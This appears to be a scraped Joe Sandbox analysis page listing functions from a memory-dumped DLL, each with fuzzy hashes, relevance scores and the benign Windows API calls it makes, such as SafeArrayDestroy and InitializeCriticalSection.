Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 5ddc7da5705b2a1f4bbb39e69e7cdae860511e705e7694936be93833d8f68d01
Instruction ID: cc530a11b06672ce4f25db1a22e5276246db9fcd65cd4911eb277e268d7f34be
Opcode Fuzzy Hash: 5ddc7da5705b2a1f4bbb39e69e7cdae860511e705e7694936be93833d8f68d01
Instruction Fuzzy Hash: 79311B70A006189FDB04DF6DCD80B9EB7B9AF89300F2089DAE519EB255DB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8992C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: acbf048cadf4687d7fb9d6d1a99824e7c6de188399f38bebf66a499fe139a90f
Instruction ID: 039bc0227c1ffdc8e4395886da84eccd276c85dea15dfb3d5ba9f4fee19c964d
Opcode Fuzzy Hash: acbf048cadf4687d7fb9d6d1a99824e7c6de188399f38bebf66a499fe139a90f
Instruction Fuzzy Hash: ED310A70E006189FDB14DFACCD80B9EB7B9AF89200F2089CAE419EB255D775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F899237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 50291cd233c4ac1168e02ffca28eb86e69c346b96dbc23f6b305283d44f6c5b2
Instruction ID: d29e2ba50676556d09f9b120f66ffc0e148c27adc6f9a06901d9e0ea3678d4fe
Opcode Fuzzy Hash: 50291cd233c4ac1168e02ffca28eb86e69c346b96dbc23f6b305283d44f6c5b2
Instruction Fuzzy Hash: BD313970E016089FDB04DFACCD80B9EB7B9AF89200F2089C6E419EB255CB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F8991A9 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: e9b9cb5158a84d3d2c8abd744fd6cafbaaa09defdd6761000aed0baa76bf46ca
Instruction ID: 5403dfbf3be8922e9d265054f4ca1763d06b0c7221edb709893f804edd312e95
Opcode Fuzzy Hash: e9b9cb5158a84d3d2c8abd744fd6cafbaaa09defdd6761000aed0baa76bf46ca
Instruction Fuzzy Hash: 6A311A70E006189FDB14DFADCD80B9EB7B9AF89200F2089C6E419EB255DB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F899118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: fb031f880160e3531bc069d4daf882517da6467d662d3167d91d1e3ce5e18824
Instruction ID: 5a5f926f81c506871e4279a842d6676ac1ff26e2ed4cc0474b5f04967345487b
Opcode Fuzzy Hash: fb031f880160e3531bc069d4daf882517da6467d662d3167d91d1e3ce5e18824
Instruction Fuzzy Hash: 1F313970E006089FCB04DF6CCD84B9EB7B9AF89200F208ADAE419EB255CB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F89908A Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 523acd4c12f6fc667fc1e53762c243b23be0d8855c1e7cc2c562572b0fab61e4
Instruction ID: d167f114d491a516f2017b910769c42eb3551f2ac30b3863b5616943fc05eb7d
Opcode Fuzzy Hash: 523acd4c12f6fc667fc1e53762c243b23be0d8855c1e7cc2c562572b0fab61e4
Instruction Fuzzy Hash: CB313970E006189FCB04DF6CCD80B9EB7B9AF89200F208ACAE519EB255DB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F89C150 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6F89C180
SafeArrayPutElement.OLEAUT32(00000000,6F893749,?), ref: 6F89C1B8
VariantClear.OLEAUT32(?), ref: 6F89C1C4
VariantCopy.OLEAUT32(6F893749,?), ref: 6F89C21B
VariantClear.OLEAUT32(?), ref: 6F89C22F
SafeArrayDestroy.OLEAUT32(00000000), ref: 6F89C23E

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
String ID:
API String ID: 3979206172-0
Opcode ID: 462cf418f3af5c34ed374269a4c68dfd690ec7245061f8ba747bfa0954f572fc
Instruction ID: 4b6dd9294df3c2051ca5a8bb3eaa47b173f074944227fdbec08e2b311130074c
Opcode Fuzzy Hash: 462cf418f3af5c34ed374269a4c68dfd690ec7245061f8ba747bfa0954f572fc
Instruction Fuzzy Hash: 5D314F71A04609AFDB04DFA8D884F9EB7B8EF8A310F10855AE915D7350EB31E941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F887370 Relevance: 9.1, APIs: 6, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 6F8D9BB5: _malloc.LIBCMT ref: 6F8D9BCF

InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6F8F11FD,000000FF,?,6F888B80,00000000,?,00000000,?,6F888C13,?,?), ref: 6F887415
InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6F8F11FD,000000FF,?,6F888B80,00000000,?,00000000,?,6F888C13,?,?), ref: 6F88741B
std::exception::exception.LIBCMT ref: 6F88743D
__CxxThrowException@8.LIBCMT ref: 6F887452
std::exception::exception.LIBCMT ref: 6F887461
__CxxThrowException@8.LIBCMT ref: 6F887476

Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C04
Part of subcall function 6F8D9BB5: std::exception::exception.LIBCMT ref: 6F8D9C1E
Part of subcall function 6F8D9BB5: __CxxThrowException@8.LIBCMT ref: 6F8D9C2F

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
String ID:
API String ID: 189561132-0
Opcode ID: 23f22e5ed5612dd16e31091c6bf40817434ec249e77a2fc3d10845d290b076f2
Instruction ID: 85dab55cfeea96650284a56d115fa41d1ae894dd0b223389b34b886356837b4a
Opcode Fuzzy Hash: 23f22e5ed5612dd16e31091c6bf40817434ec249e77a2fc3d10845d290b076f2
Instruction Fuzzy Hash: 1A317AB1901748AFC710CF59C880A9AFBF4FF99210B4489AEE85A8BB40D331F505CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F898F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 6272c1548e4ebb51ffadaf49bdca00ba0f7037eaa3f70576b0b89088eb133738
Instruction ID: 77745f13dfa94d7566517bcd7a9a05c222a81f1c1373559056f7a421c9f65097
Opcode Fuzzy Hash: 6272c1548e4ebb51ffadaf49bdca00ba0f7037eaa3f70576b0b89088eb133738
Instruction Fuzzy Hash: 8A312970E006189FDB14DB6CCC84B9EB7BAAF85304F648ADAE419EB241C775E940CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F898E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 665344e3b9e88e0f6c1854a057b4f517cf28735bad83f69785d84239f090f2bb
Instruction ID: 533cacac0c40e2d36b4a5cce352d65f9d53f9a4cd9588332f7a66bb12aa73ec6
Opcode Fuzzy Hash: 665344e3b9e88e0f6c1854a057b4f517cf28735bad83f69785d84239f090f2bb
Instruction Fuzzy Hash: 7C313E70E006189FCB14DF6CCC84B9DB7B9AF85200F604ACAE419EB285C771E940CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F898D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 47848e301ec9bdce66e15c8347b5ee57d24c5dd46576934027c187a11c531e8c
Instruction ID: 5addb45c314c0f3dac22e31919cbcbe625a2d4470f861973b4801334a91c6b13
Opcode Fuzzy Hash: 47848e301ec9bdce66e15c8347b5ee57d24c5dd46576934027c187a11c531e8c
Instruction Fuzzy Hash: DC313C70E006189FCB14DF6CCC84B9EB7B9AF85200F608ACAE419EB285D775E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F898C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 25d219dc5bd8881ecf51931291a5d29c31f63f1fc95b0bc467bf8a6813f77857
Instruction ID: c90f2f0d07bd8f834154a5b24454e74d4ffd97c14acbc5d2ae3ce1012bfd1950
Opcode Fuzzy Hash: 25d219dc5bd8881ecf51931291a5d29c31f63f1fc95b0bc467bf8a6813f77857
Instruction Fuzzy Hash: 91313C70E016189FDB14DB6DCC84B9EB7B9AF85200F6489DAE419EB245C775ED40CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F898B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

API ID: ArrayDestroySafe
String ID:
API String ID: 4225690600-0
Opcode ID: 318e69e3ab6b75a628bd8caee43d24ead35a4bc62c6bd15bcdb465fe3d157268
Instruction ID: a8762a6f4e5e9441b57b9f254791eead23f32ac7288de6063fa626749e799388
Opcode Fuzzy Hash: 318e69e3ab6b75a628bd8caee43d24ead35a4bc62c6bd15bcdb465fe3d157268
Instruction Fuzzy Hash: 93313A70E016189FCB14DB6CCC80B9EB7B9AF85200F648ACAE419EB241CB75E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F89884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE63
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE73
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE86
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AE99
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEAC
SafeArrayDestroy.OLEAUT32(?), ref: 6F89AEBF

Memory Dump Source

Source File: 00000006.00000002.1929893908.000000006F871000.00000020.00000001.01000000.00000009.sdmp, Offset: 6F870000, based on PE: true

Associated: 00000006.00000002.1929856472.000000006F870000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930391878.000000006F90E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930448908.000000006F910000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930475832.000000006F911000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930507288.000000006F913000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930563615.000000006F91C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.1930629813.000000006F91E000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f870000_907.jbxd

Similarity

